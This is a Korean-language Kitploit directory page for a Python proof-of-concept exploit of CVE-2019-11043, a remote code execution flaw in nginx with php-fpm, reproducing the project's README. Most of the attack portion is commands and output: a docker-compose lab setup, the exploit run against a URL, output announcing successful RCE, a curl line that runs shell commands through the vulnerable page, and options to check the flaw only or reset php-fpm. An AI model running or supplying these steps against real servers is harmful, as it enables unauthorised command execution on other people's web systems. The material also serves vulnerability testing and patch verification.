Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-11043 — (PoC) neex의 CVE-2019-11043 익스플로잇 Python 버전 | Kitploit
도구/GitHubGitHub/themiddleblue/cve-2019-11043
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubthemiddleblue/cve-2019-11043

CVE-2019-11043

(PoC) neex의 CVE-2019-11043 익스플로잇 Python 버전

저장소 보기
146456년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PoC CVE-2019-11043

CVE-2019-11043 익스플로잇의 Python 버전 https://github.com/neex/phuip-fpizdam
이 PoC는 아직 초안이며, @neex가 작성한 익스플로잇을 사용하세요.
취약점 분석: https://paper.seebug.org/1064/

PoC 설정

nginx와 php-fpm을 띄우려면 docker compose를 실행하세요:

root@kitploit:~
# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

php-fpm 로그를 확인하려면 다음을 실행할 수 있습니다:

root@kitploit:~
docker logs --tail 10 --follow php

익스플로잇

root@kitploit:~
# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

익스플로잇을 건너뛰고 취약점만 확인하려면:

root@kitploit:~
python3 exploit.py --url http://localhost/index.php --skip-rce
#...
python3 exploit.py --url http://localhost/index.php --reset

--reset을 사용하여 php-fpm 프로세스를 종료하고 주입된 모든 PHP 설정을 초기화할 수 있습니다:

root@kitploit:~
python3 exploit.py --url http://localhost/index.php --reset

PoC 동영상

https://twitter.com/Menin_TheMiddle/status/1188776386569355265

도구 다운로드